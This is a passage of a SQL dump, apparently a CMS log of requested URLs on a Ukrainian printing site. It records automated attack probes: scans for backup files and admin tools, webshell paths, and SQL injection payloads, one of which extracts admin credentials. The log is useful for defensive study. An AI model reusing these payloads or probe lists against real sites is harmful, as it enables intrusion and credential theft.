00:00:00',301),(13925,'http://ekvatorprint.com.ua/phpMyAdmin-4.8.0/index.php',NULL,'','',3,0,'2018-09-16 15:51:34','0000-00-00 00:00:00',301),(13926,'http://ekvatorprint.com.ua/phpMyAdmin-4.8.1-all-languages/index.php',NULL,'','',3,0,'2018-09-16 15:51:35','0000-00-00 00:00:00',301),(13927,'http://ekvatorprint.com.ua/phpMyAdmin-4.8.1/index.php',NULL,'','',3,0,'2018-09-16 15:51:35','0000-00-00 00:00:00',301),(13928,'http://ekvatorprint.com.ua/phpmyadmin/index.php',NULL,'','',3,0,'2018-09-16 15:51:36','0000-00-00 00:00:00',301),(13929,'http://ekvatorprint.com.ua/phpmyAdmin/index.php',NULL,'','',3,0,'2018-09-16 15:51:36','0000-00-00 00:00:00',301),(13930,'http://ekvatorprint.com.ua/phpMyAdmin/index.php',NULL,'','',3,0,'2018-09-16 15:51:37','0000-00-00 00:00:00',301),(13931,'http://ekvatorprint.com.ua/Site/',NULL,'','',1,0,'2018-09-18 01:57:29','0000-00-00 00:00:00',301),(13932,'http://ekvatorprint.com.ua/preview/',NULL,'','',1,0,'2018-09-18 01:57:29','0000-00-00 00:00:00',301),(13933,'http://ekvatorprint.com.ua/Site2/',NULL,'','',1,0,'2018-09-18 01:57:29','0000-00-00 00:00:00',301),(13934,'http://ekvatorprint.com.ua/Site1/',NULL,'','',1,0,'2018-09-18 01:57:29','0000-00-00 00:00:00',301),(13935,'http://ekvatorprint.com.ua/wordpress/test/',NULL,'','',1,0,'2018-09-18 01:57:29','0000-00-00 00:00:00',301),(13936,'http://ekvatorprint.com.ua/wptest/',NULL,'','',1,0,'2018-09-18 15:31:11','0000-00-00 00:00:00',301),(13937,'http://ekvatorprint.com.ua/en/search?controller=search&orderby=position&orderway=desc&search_query=1%\'+AND+SLEEP(10)#&submit_search=1\'',NULL,'http://ekvatorprint.com.ua/en/search?controller=search&orderby=position&orderway=desc&search_query=1%25%27+AND+SLEEP%2810%29%23&submit_search=1\'','',1,0,'2018-09-18 18:43:18','0000-00-00 00:00:00',301),(13938,'http://ekvatorprint.com.ua/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1\'',NULL,'http://ekvatorprint.com.ua/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=1\'','',1,0,'2018-09-18 22:05:54','0000-00-00 00:00:00',301),(13939,'http://ekvatorprint.com.ua/Blog/',NULL,'','',1,0,'2018-09-19 18:52:05','0000-00-00 00:00:00',301),(13940,'http://ekvatorprint.com.ua/Blogs/',NULL,'','',1,0,'2018-09-19 18:52:05','0000-00-00 00:00:00',301),(13941,'http://ekvatorprint.com.ua/wp-content/plugins/wp-mobile-detector/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-mobile-detector/readme.txt','',3,0,'2018-09-19 23:16:35','0000-00-00 00:00:00',301),(13942,'http://ekvatorprint.com.ua/components/thumbsj3tmp/ht/img.resize0644.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-09-20 07:29:07','0000-00-00 00:00:00',301),(13943,'http://ekvatorprint.com.ua/index.php?option=com_easybook',NULL,'ekvatorprint.com.ua/index.php?option=com_easybook','',1,0,'2018-09-22 18:51:24','0000-00-00 00:00:00',301),(13944,'http://ekvatorprint.com.ua/STRUTS_STRU',NULL,'','',1,0,'2018-09-26 09:23:29','0000-00-00 00:00:00',301),(13945,'http://ekvatorprint.com.ua/plugins/editors/jckeditor/plugins/jtreelink/dialogs/jtreelink.js',NULL,'','',1,0,'2018-09-26 17:23:40','0000-00-00 00:00:00',301),(13946,'http://ekvatorprint.com.ua/_ekvatorprint.com.ua.sql',NULL,'','',2,0,'2018-09-26 20:57:46','0000-00-00 00:00:00',301),(13947,'http://ekvatorprint.com.ua/_ekvatorprint.sql',NULL,'','',2,0,'2018-09-26 20:57:46','0000-00-00 00:00:00',301),(13948,'http://ekvatorprint.com.ua/_backup.sql',NULL,'','',2,0,'2018-09-26 20:58:05','0000-00-00 00:00:00',301),(13949,'http://ekvatorprint.com.ua/_backup.sql.zip',NULL,'','',2,0,'2018-09-26 20:58:05','0000-00-00 00:00:00',301),(13950,'http://ekvatorprint.com.ua/db/ekvatorprint.com.ua.bak',NULL,'','',2,0,'2018-09-26 20:58:07','0000-00-00 00:00:00',301),(13951,'http://ekvatorprint.com.ua/db/ekvatorprint.bak',NULL,'','',2,0,'2018-09-26 20:58:08','0000-00-00 00:00:00',301),(13952,'http://ekvatorprint.com.ua/sql/db_backup.ekvatorprint.com.ua.sql.gz',NULL,'','',2,0,'2018-09-26 20:58:09','0000-00-00 00:00:00',301),(13953,'http://ekvatorprint.com.ua/sql/db_backup.ekvatorprint.sql.gz',NULL,'','',2,0,'2018-09-26 20:58:09','0000-00-00 00:00:00',301),(13954,'http://ekvatorprint.com.ua/sql/db_backup.sql.gz',NULL,'','',2,0,'2018-09-26 20:58:09','0000-00-00 00:00:00',301),(13955,'http://ekvatorprint.com.ua/sql/db_backup.ekvatorprint.com.ua.sql',NULL,'','',2,0,'2018-09-26 20:58:09','0000-00-00 00:00:00',301),(13956,'http://ekvatorprint.com.ua/sql/db_backup.ekvatorprint.sql',NULL,'','',2,0,'2018-09-26 20:58:09','0000-00-00 00:00:00',301),(13957,'http://ekvatorprint.com.ua/sql/dump.sql',NULL,'','',2,0,'2018-09-26 20:58:09','0000-00-00 00:00:00',301),(13958,'http://ekvatorprint.com.ua/sql/Dump.sql',NULL,'','',2,0,'2018-09-26 20:58:10','0000-00-00 00:00:00',301),(13959,'http://ekvatorprint.com.ua/sql/ekvatorprint.com.ua.sql',NULL,'','',2,0,'2018-09-26 20:58:10','0000-00-00 00:00:00',301),(13960,'http://ekvatorprint.com.ua/sql/ekvatorprint.sql',NULL,'','',2,0,'2018-09-26 20:58:10','0000-00-00 00:00:00',301),(13961,'http://ekvatorprint.com.ua/sql/ekvatorprint.com.ua.bak',NULL,'','',2,0,'2018-09-26 20:58:10','0000-00-00 00:00:00',301),(13962,'http://ekvatorprint.com.ua/sql/ekvatorprint.bak',NULL,'','',2,0,'2018-09-26 20:58:11','0000-00-00 00:00:00',301),(13963,'http://ekvatorprint.com.ua/sql/backup.sql',NULL,'','',2,0,'2018-09-26 20:58:11','0000-00-00 00:00:00',301),(13964,'http://ekvatorprint.com.ua/sql/backup.sql.zip',NULL,'','',2,0,'2018-09-26 20:58:11','0000-00-00 00:00:00',301),(13965,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua.bak',NULL,'','',2,0,'2018-09-26 20:58:15','0000-00-00 00:00:00',301),(13966,'http://ekvatorprint.com.ua/database/ekvatorprint.bak',NULL,'','',2,0,'2018-09-26 20:58:15','0000-00-00 00:00:00',301),(13967,'http://ekvatorprint.com.ua/_database.sql',NULL,'','',2,0,'2018-09-26 20:58:20','0000-00-00 00:00:00',301),(13968,'http://ekvatorprint.com.ua/_localhost.sql',NULL,'','',2,0,'2018-09-26 20:58:20','0000-00-00 00:00:00',301),(13969,'http://ekvatorprint.com.ua/_sql.sql',NULL,'','',2,0,'2018-09-26 20:58:21','0000-00-00 00:00:00',301),(13970,'http://ekvatorprint.com.ua/_bak.sql',NULL,'','',2,0,'2018-09-26 20:58:21','0000-00-00 00:00:00',301),(13971,'http://ekvatorprint.com.ua/sql/database.sql',NULL,'','',2,0,'2018-09-26 20:58:21','0000-00-00 00:00:00',301),(13972,'http://ekvatorprint.com.ua/sql/localhost.sql',NULL,'','',2,0,'2018-09-26 20:58:21','0000-00-00 00:00:00',301),(13973,'http://ekvatorprint.com.ua/sql/sql.sql',NULL,'','',2,0,'2018-09-26 20:58:21','0000-00-00 00:00:00',301),(13974,'http://ekvatorprint.com.ua/sql/bak.sql',NULL,'','',2,0,'2018-09-26 20:58:22','0000-00-00 00:00:00',301),(13975,'http://ekvatorprint.com.ua/ekvatorprint.bz2',NULL,'google.com','',1,0,'2018-09-28 21:50:01','0000-00-00 00:00:00',301),(13976,'http://ekvatorprint.com.ua/sql.rar',NULL,'google.com','',1,0,'2018-09-28 21:50:03','0000-00-00 00:00:00',301),(13977,'http://ekvatorprint.com.ua/backups.bz2',NULL,'google.com','',1,0,'2018-09-28 21:50:05','0000-00-00 00:00:00',301),(13978,'http://ekvatorprint.com.ua/dump.bz2',NULL,'google.com','',1,0,'2018-09-28 21:50:05','0000-00-00 00:00:00',301),(13979,'http://ekvatorprint.com.ua/fileman/dev.html',NULL,'http://ekvatorprint.com.ua/fileman/dev.html','',1,0,'2018-09-29 01:17:42','0000-00-00 00:00:00',301),(13980,'http://ekvatorprint.com.ua/cms/editor/filemanager/connectors/uploadtest404.html',NULL,'','',1,0,'2018-09-30 03:09:59','0000-00-00 00:00:00',301),(13981,'http://ekvatorprint.com.ua/cms/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:00','0000-00-00 00:00:00',301),(13982,'http://ekvatorprint.com.ua/plugins/p_fckeditor/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:00','0000-00-00 00:00:00',301),(13983,'http://ekvatorprint.com.ua/js/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:00','0000-00-00 00:00:00',301),(13984,'http://ekvatorprint.com.ua/cms/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:01','0000-00-00 00:00:00',301),(13985,'http://ekvatorprint.com.ua/editor/editor/filemanager/upload/test.html',NULL,'','',1,0,'2018-09-30 03:10:01','0000-00-00 00:00:00',301),(13986,'http://ekvatorprint.com.ua/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:01','0000-00-00 00:00:00',301),(13987,'http://ekvatorprint.com.ua/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:02','0000-00-00 00:00:00',301),(13988,'http://ekvatorprint.com.ua/sites/all/modules/fckeditor/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:02','0000-00-00 00:00:00',301),(13989,'http://ekvatorprint.com.ua/HTMLEditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:02','0000-00-00 00:00:00',301),(13990,'http://ekvatorprint.com.ua/ckeditor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:02','0000-00-00 00:00:00',301),(13991,'http://ekvatorprint.com.ua/wysiwyg/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:03','0000-00-00 00:00:00',301),(13992,'http://ekvatorprint.com.ua/editor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:03','0000-00-00 00:00:00',301),(13993,'http://ekvatorprint.com.ua/admin/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:03','0000-00-00 00:00:00',301),(13994,'http://ekvatorprint.com.ua/modules/fckeditor/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:04','0000-00-00 00:00:00',301),(13995,'http://ekvatorprint.com.ua/administrator/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:04','0000-00-00 00:00:00',301),(13996,'http://ekvatorprint.com.ua/admin/editor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2018-09-30 03:10:04','0000-00-00 00:00:00',301),(13997,'http://ekvatorprint.com.ua/_phpMyAdmin/scripts/setup.php',NULL,'','',12,0,'2018-09-30 20:48:26','0000-00-00 00:00:00',301),(13998,'http://ekvatorprint.com.ua/contactshttps:/www.yandex.ua',NULL,'','',1,0,'2018-10-03 07:00:05','0000-00-00 00:00:00',301),(13999,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_new.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:46','0000-00-00 00:00:00',301),(14000,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_bak.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:47','0000-00-00 00:00:00',301),(14001,'http://ekvatorprint.com.ua/ekvatorprint_ekvatorprint.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:47','0000-00-00 00:00:00',301),(14002,'http://ekvatorprint.com.ua/ekvatorprint_1.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:47','0000-00-00 00:00:00',301),(14003,'http://ekvatorprint.com.ua/_.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:48','0000-00-00 00:00:00',301),(14004,'http://ekvatorprint.com.ua/x.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:48','0000-00-00 00:00:00',301),(14005,'http://ekvatorprint.com.ua/blog.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:48','0000-00-00 00:00:00',301),(14006,'http://ekvatorprint.com.ua/blog.sql.gz',NULL,'google.com','',1,0,'2018-10-03 22:06:48','0000-00-00 00:00:00',301),(14007,'http://ekvatorprint.com.ua/new.sql.gz',NULL,'google.com','',1,0,'2018-10-03 22:06:49','0000-00-00 00:00:00',301),(14008,'http://ekvatorprint.com.ua/new.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:49','0000-00-00 00:00:00',301),(14009,'http://ekvatorprint.com.ua/ekvatorprint_wp.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:49','0000-00-00 00:00:00',301),(14010,'http://ekvatorprint.com.ua/ekvatorprint_wp.sql.gz',NULL,'google.com','',1,0,'2018-10-03 22:06:50','0000-00-00 00:00:00',301),(14011,'http://ekvatorprint.com.ua/wp.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:50','0000-00-00 00:00:00',301),(14012,'http://ekvatorprint.com.ua/wp.sql.gz',NULL,'google.com','',1,0,'2018-10-03 22:06:51','0000-00-00 00:00:00',301),(14013,'http://ekvatorprint.com.ua/ekvatorprint2018.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:51','0000-00-00 00:00:00',301),(14014,'http://ekvatorprint.com.ua/ekvatorprint2018.sql.gz',NULL,'google.com','',1,0,'2018-10-03 22:06:51','0000-00-00 00:00:00',301),(14015,'http://ekvatorprint.com.ua/magento.sql',NULL,'google.com','',1,0,'2018-10-03 22:06:52','0000-00-00 00:00:00',301),(14016,'http://ekvatorprint.com.ua/accesson.php',NULL,'','',1,0,'2018-10-05 03:10:55','0000-00-00 00:00:00',301),(14017,'http://ekvatorprint.com.ua/wp-content/themes/qualifire/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/qualifire/style.css','',3,0,'2018-10-06 01:50:27','0000-00-00 00:00:00',301),(14018,'http://ekvatorprint.com.ua/payload.php',NULL,'','',1,0,'2018-10-06 14:06:54','0000-00-00 00:00:00',301),(14019,'http://ekvatorprint.com.ua/vb/',NULL,'','',1,0,'2018-10-10 03:08:30','0000-00-00 00:00:00',301),(14020,'http://ekvatorprint.com.ua/forum/forum.php',NULL,'','',1,0,'2018-10-10 03:08:32','0000-00-00 00:00:00',301),(14021,'http://ekvatorprint.com.ua/forums/',NULL,'','',1,0,'2018-10-10 03:08:32','0000-00-00 00:00:00',301),(14022,'http://ekvatorprint.com.ua/community/forum/',NULL,'','',1,0,'2018-10-10 03:08:32','0000-00-00 00:00:00',301),(14023,'http://ekvatorprint.com.ua/community/',NULL,'','',1,0,'2018-10-10 03:08:33','0000-00-00 00:00:00',301),(14024,'http://ekvatorprint.com.ua/wp-includes/css/login_wall.php?login=cmd',NULL,'','',1,0,'2018-10-10 03:48:24','0000-00-00 00:00:00',301),(14025,'http://ekvatorprint.com.ua/wp-admin/maint/index.php',NULL,'','',1,0,'2018-10-10 20:10:05','0000-00-00 00:00:00',301),(14026,'http://ekvatorprint.com.ua/phpcms/base.php',NULL,'','',1,0,'2018-10-11 00:09:40','0000-00-00 00:00:00',301),(14027,'http://ekvatorprint.com.ua/wp-admin/includes/index.php',NULL,'','',1,0,'2018-10-12 01:27:13','0000-00-00 00:00:00',301),(14028,'http://ekvatorprint.com.ua/wp-content/themes/better-mag/footer.php',NULL,'','',1,0,'2018-10-12 16:01:21','0000-00-00 00:00:00',301),(14029,'http://ekvatorprint.com.ua/config/AspCms_config.asp',NULL,'','',1,0,'2018-10-13 17:06:43','0000-00-00 00:00:00',301),(14030,'http://ekvatorprint.com.ua/wp-content/themes/twentyfifteen/content-link.php',NULL,'','',1,0,'2018-10-13 20:34:54','0000-00-00 00:00:00',301),(14031,'http://ekvatorprint.com.ua/index.php/\n',NULL,'','',3,0,'2018-10-15 17:47:25','0000-00-00 00:00:00',301),(14032,'http://ekvatorprint.com.ua/modules/\n',NULL,'','',3,0,'2018-10-15 17:47:25','0000-00-00 00:00:00',301),(14033,'http://ekvatorprint.com.ua/templates/\n',NULL,'','',3,0,'2018-10-15 17:47:26','0000-00-00 00:00:00',301),(14034,'http://ekvatorprint.com.ua/tmp/\n',NULL,'','',4,0,'2018-10-15 17:47:26','0000-00-00 00:00:00',301),(14035,'http://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/404.php',NULL,'','',2,0,'2018-10-15 19:16:55','0000-00-00 00:00:00',301),(14036,'http://ekvatorprint.com.ua/wp-content/themes/twentyeighteen/404.php',NULL,'','',1,0,'2018-10-16 01:15:46','0000-00-00 00:00:00',301),(14037,'http://ekvatorprint.com.ua/wp-content/plugins/hello_dolly/hello_dolly.php',NULL,'','',1,0,'2018-10-16 01:15:46','0000-00-00 00:00:00',301),(14038,'http://ekvatorprint.com.ua/css_.php',NULL,'','',6,0,'2018-10-16 07:32:20','0000-00-00 00:00:00',301),(14039,'http://ekvatorprint.com.ua/bea_wls_deployment_internal',NULL,'','',14,0,'2018-10-16 22:14:04','0000-00-00 00:00:00',301),(14040,'http://ekvatorprint.com.ua/wp-content/themes/template-parts/content-single.php',NULL,'','',1,0,'2018-10-17 01:15:26','0000-00-00 00:00:00',301),(14041,'http://ekvatorprint.com.ua/logs/\n',NULL,'','',2,0,'2018-10-17 12:19:30','0000-00-00 00:00:00',301),(14042,'http://ekvatorprint.com.ua/layouts/\n',NULL,'','',1,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14043,'http://ekvatorprint.com.ua/plugins/\n',NULL,'','',3,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14044,'http://ekvatorprint.com.ua/cache/\n',NULL,'','',2,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14045,'http://ekvatorprint.com.ua/libraries/\n',NULL,'','',2,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14046,'http://ekvatorprint.com.ua/administrator/\n',NULL,'','',2,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14047,'http://ekvatorprint.com.ua/language/\n',NULL,'','',2,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14048,'http://ekvatorprint.com.ua/components/\n',NULL,'','',2,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14049,'http://ekvatorprint.com.ua/bin/\n',NULL,'','',2,0,'2018-10-17 12:19:31','0000-00-00 00:00:00',301),(14050,'http://ekvatorprint.com.ua/cli/\n',NULL,'','',3,0,'2018-10-17 12:19:32','0000-00-00 00:00:00',301),(14051,'http://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/inc/color-patterns.php',NULL,'','',1,0,'2018-10-17 15:22:15','0000-00-00 00:00:00',301),(14052,'http://ekvatorprint.com.ua/console/css/dashboard-min.css',NULL,'','',16,0,'2018-10-17 23:27:07','0000-00-00 00:00:00',301),(14053,'http://ekvatorprint.com.ua/wp-content/themes/twentytwelve/404.php',NULL,'','',1,0,'2018-10-18 22:32:18','0000-00-00 00:00:00',301),(14054,'http://ekvatorprint.com.ua/includes/\n',NULL,'','',2,0,'2018-10-18 22:40:26','0000-00-00 00:00:00',301),(14055,'http://ekvatorprint.com.ua/component/\n',NULL,'','',1,0,'2018-10-18 22:40:26','0000-00-00 00:00:00',301),(14056,'http://ekvatorprint.com.ua/installation/\n',NULL,'','',1,0,'2018-10-18 22:40:26','0000-00-00 00:00:00',301),(14057,'http://ekvatorprint.com.ua/media/\n',NULL,'','',1,0,'2018-10-18 22:40:26','0000-00-00 00:00:00',301),(14058,'http://ekvatorprint.com.ua/images/\n',NULL,'','',1,0,'2018-10-18 22:40:27','0000-00-00 00:00:00',301),(14059,'http://ekvatorprint.com.ua/jQuery-File-Upload/js/jquery.fileupload.js',NULL,'','',1,0,'2018-10-20 08:04:13','0000-00-00 00:00:00',301),(14060,'http://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/footer.php',NULL,'','',1,0,'2018-10-22 11:07:42','0000-00-00 00:00:00',301),(14061,'http://ekvatorprint.com.ua/wp-content/themes/classic/404.php',NULL,'','',1,0,'2018-10-23 05:59:14','0000-00-00 00:00:00',301),(14062,'http://ekvatorprint.com.ua/static/image/feed/discuz.gif',NULL,'','',1,0,'2018-10-23 06:07:19','0000-00-00 00:00:00',301),(14063,'http://ekvatorprint.com.ua/wp-content/themes/advancesettings/404.php',NULL,'','',1,0,'2018-10-23 21:15:33','0000-00-00 00:00:00',301),(14064,'http://ekvatorprint.com.ua/wp-content/themes/twentyfifteen/content.php',NULL,'','',1,0,'2018-10-24 12:46:48','0000-00-00 00:00:00',301),(14065,'http://ekvatorprint.com.ua/wp-content/themes/bloggingcream/404.php',NULL,'','',1,0,'2018-10-25 03:54:27','0000-00-00 00:00:00',301),(14066,'http://ekvatorprint.com.ua/wp-content/themes/default/404.php',NULL,'','',1,0,'2018-10-25 19:02:36','0000-00-00 00:00:00',301),(14067,'http://ekvatorprint.com.ua/wp-content/themes/agregado/404.php',NULL,'','',1,0,'2018-10-26 11:23:41','0000-00-00 00:00:00',301),(14068,'http://ekvatorprint.com.ua/wp-content/themes/CherryFramework/404.php',NULL,'','',1,0,'2018-10-27 03:25:00','0000-00-00 00:00:00',301),(14069,'http://ekvatorprint.com.ua/MySQLDumper1.24.2/msd1.24.2/index.php',NULL,'','',1,0,'2018-10-27 04:03:37','0000-00-00 00:00:00',301),(14070,'http://ekvatorprint.com.ua/MySQLDumper1.24.3/msd1.24.3/index.php',NULL,'','',1,0,'2018-10-27 04:03:37','0000-00-00 00:00:00',301),(14071,'http://ekvatorprint.com.ua/MySQLDumper1.24.4/msd1.24.4/index.php',NULL,'','',1,0,'2018-10-27 04:03:37','0000-00-00 00:00:00',301),(14072,'http://ekvatorprint.com.ua/msd1.24.2/index.php',NULL,'','',1,0,'2018-10-27 04:03:37','0000-00-00 00:00:00',301),(14073,'http://ekvatorprint.com.ua/msd1.24.3/index.php',NULL,'','',1,0,'2018-10-27 04:03:37','0000-00-00 00:00:00',301),(14074,'http://ekvatorprint.com.ua/msd1.24.4/index.php',NULL,'','',1,0,'2018-10-27 04:03:38','0000-00-00 00:00:00',301),(14075,'http://ekvatorprint.com.ua/msd1/index.php',NULL,'','',1,0,'2018-10-27 04:03:38','0000-00-00 00:00:00',301),(14076,'http://ekvatorprint.com.ua/msd/index.php',NULL,'','',1,0,'2018-10-27 04:03:38','0000-00-00 00:00:00',301),(14077,'http://ekvatorprint.com.ua/wp-content/themes/twentyfifteen/index.php',NULL,'','',1,0,'2018-10-27 19:52:41','0000-00-00 00:00:00',301),(14078,'http://ekvatorprint.com.ua/xSsIscHX2OKu1NVmqoNEpuQ5f',NULL,'http://ekvatorprint.com.ua/xSsIscHX2OKu1NVmqoNEpuQ5f','',1,0,'2018-10-28 03:33:15','0000-00-00 00:00:00',301),(14079,'http://ekvatorprint.com.ua/templates/beez3/seos.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-10-30 18:06:31','0000-00-00 00:00:00',301),(14080,'http://ekvatorprint.com.ua/seos.php',NULL,'ekvatorprint.com.ua','',1,0,'2018-10-30 18:06:50','0000-00-00 00:00:00',301),(14081,'http://ekvatorprint.com.ua/security.txt',NULL,'','',5,0,'2018-11-01 10:12:11','0000-00-00 00:00:00',301),(14082,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/files/XAttacker.php?X=Attacker',NULL,'','',1,0,'2018-11-02 05:19:00','0000-00-00 00:00:00',301),(14083,'http://ekvatorprint.com.ua/com_sexycontactform/fileupload/files/XAttacker.php?X=Attacker',NULL,'','',1,0,'2018-11-02 05:19:02','0000-00-00 00:00:00',301),(14084,'http://ekvatorprint.com.ua/images/stories/XAttacker.php.xxxjpg?X=Attacker',NULL,'','',2,0,'2018-11-02 05:19:03','0000-00-00 00:00:00',301),(14085,'http://ekvatorprint.com.ua/jwallpapers_files/plupload/XAttacker.php?X=Attacker',NULL,'','',1,0,'2018-11-02 05:19:04','0000-00-00 00:00:00',301),(14086,'http://ekvatorprint.com.ua/components/com_facileforms/libraries/jquery/XAttacker.php?X=Attacker',NULL,'','',1,0,'2018-11-02 05:19:05','0000-00-00 00:00:00',301),(14087,'http://ekvatorprint.com.ua/flow.php?step=update_cart',NULL,'','',1,0,'2018-11-06 20:45:59','0000-00-00 00:00:00',301),(14088,'http://ekvatorprint.com.ua/respond.php?code=alipay&subject=0&out_trade_no=\0\' and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,0x7c,password) from ecs_admin_user limit 1))a from information_schema.tables group by a)b) -- By seay',NULL,'','',1,0,'2018-11-06 20:46:01','0000-00-00 00:00:00',301),(14089,'http://ekvatorprint.com.ua/system/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 07:54:28','0000-00-00 00:00:00',301),(14090,'http://ekvatorprint.com.ua/system/storage/logs/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 13:44:40','0000-00-00 00:00:00',301),(14091,'http://ekvatorprint.com.ua/cache/seo_script.php?jweyc=b37667b627b392d522b622b574642584442554f5428297e69627',NULL,'','',1,0,'2018-11-07 19:38:51','0000-00-00 00:00:00',301),(14092,'http://ekvatorprint.com.ua/oscommerce/',NULL,'','',1,0,'2018-11-09 21:13:39','0000-00-00 00:00:00',301),(14093,'http://ekvatorprint.com.ua/osc/',NULL,'','',1,0,'2018-11-09 21:13:47','0000-00-00 00:00:00',301),(14094,'http://ekvatorprint.com.ua/ushop/',NULL,'','',1,0,'2018-11-09 21:13:48','0000-00-00 00:00:00',301),(14095,'http://ekvatorprint.com.ua/modules/vtemslideshow/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/vtemslideshow/uploadimage.php','',1,0,'2018-11-10 07:40:06','0000-00-00 00:00:00',301),(14096,'http://ekvatorprint.com.ua/images/kitten-large.png',NULL,'http://ekvatorprint.com.ua/printing-on-vinyl?yclid=6736722720989402445','',111,0,'2018-11-13 10:29:28','0000-00-00 00:00:00',301),(14097,'http://ekvatorprint.com.ua/images/pimeri_shablonov/%D0%BC%D1%88-5-2.png',NULL,'https://cs1.livemaster.ru/storage/36/4c/72c766365d5219180e3980782b--kartiny-panno-batik-kartina-sinyaya-ptitsa.jpg','',2,0,'2018-11-14 02:45:37','0000-00-00 00:00:00',301),(14098,'http://ekvatorprint.com.ua/images/pimeri_shablonov/%D0%BC%D1%88-4-6.png',NULL,'http://irecommend.ru/sites/default/files/imagecache/copyright1/user-images/45181/DT1X9tg3RmHif0H4DEnXw.jpg','',1,0,'2018-11-14 02:46:05','0000-00-00 00:00:00',301),(14099,'http://ekvatorprint.com.ua/scripts/cfformhistory.cfm',NULL,'','',10,0,'2018-11-15 03:13:07','0000-00-00 00:00:00',301),(14100,'http://ekvatorprint.com.ua/images/pimeri_shablonov/%d0%bc%d1%88-3-2.png',NULL,'http://www.muma-lehavre.fr/sites/default/files/thumbnails/image/bd_signac_volies_st_malo.jpg','',2,0,'2018-11-16 23:53:20','0000-00-00 00:00:00',301),(14101,'http://ekvatorprint.com.ua/wp-json/wp/v2/users/',NULL,'','',3,0,'2018-11-17 17:52:24','0000-00-00 00:00:00',301),(14102,'http://ekvatorprint.com.ua/assets/components/gallery/css/fileuploader.css',NULL,'http://ekvatorprint.com.ua/assets/components/gallery/css/fileuploader.css','',1,0,'2018-11-17 18:01:18','0000-00-00 00:00:00',301),(14103,'http://ekvatorprint.com.ua/trebovaniya---?',NULL,'','',1,0,'2018-11-19 15:10:12','0000-00-00 00:00:00',301),(14104,'http://ekvatorprint.com.ua/???',NULL,'','',1,0,'2018-11-19 15:10:12','0000-00-00 00:00:00',301),(14105,'http://ekvatorprint.com.ua/printing-on-vinyl/templates/gk_ilife/favicon.ico',NULL,'','',2,0,'2018-11-19 16:13:37','0000-00-00 00:00:00',301),(14106,'http://ekvatorprint.com.ua/assets/components/gallery/css/mgr.css',NULL,'http://ekvatorprint.com.ua/assets/components/gallery/css/mgr.css','',1,0,'2018-11-19 16:25:35','0000-00-00 00:00:00',301),(14107,'http://ekvatorprint.com.ua/modules/mod_dionefileuploader/upload.php',NULL,'http://ekvatorprint.com.ua/modules/mod_dionefileuploader/upload.php','',3,0,'2018-11-22 02:21:54','0000-00-00 00:00:00',301),(14108,'http://ekvatorprint.com.ua/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/art-picture-shop/admin/file-upload/server/php/','',1,0,'2018-11-23 01:42:25','0000-00-00 00:00:00',301),(14109,'http://ekvatorprint.com.ua/wp-content/themes/sehf/server/php/',NULL,'http://ekvatorprint.com.ua/wp-content/themes/sehf/server/php/','',1,0,'2018-11-24 02:10:22','0000-00-00 00:00:00',301),(14110,'http://ekvatorprint.com.ua/e107_admin/admin.php',NULL,'http://ekvatorprint.com.ua/e107_admin/admin.php','',1,0,'2018-11-24 13:29:24','0000-00-00 